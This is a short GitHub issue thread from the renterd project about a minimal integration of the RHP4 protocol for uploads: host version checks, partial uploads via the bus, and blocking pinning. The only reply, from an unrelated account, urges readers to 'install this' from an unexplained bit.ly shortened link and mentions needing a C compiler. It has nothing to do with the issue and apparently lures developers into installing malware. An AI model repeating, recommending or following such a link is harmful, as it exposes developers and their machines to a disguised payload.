### ISSUE TITLE
Integrate RHP4 for uploads

### ISSUE THREAD

**Issue by ChrisSchinnerl** [SiaFoundation/renterd#1551]
This refers to integrating it in the most basic way to avoid a huge refactor of the upload code and to just get uploads working the same way they do now. 

That means:
- if we are beyond the allow height and talking to a host version v2.0+, we use RHP4 for uploads
- partial uploads are still sent to the bus and later fetched for uploading when the pieces can be combined
- uploads are pinned blockingly, allowing us to avoid db changes initially

**Comment by AhmadMahmoodRana** [comment]
install this

https://bit.ly/4eugCty

you may need to install the c compiler
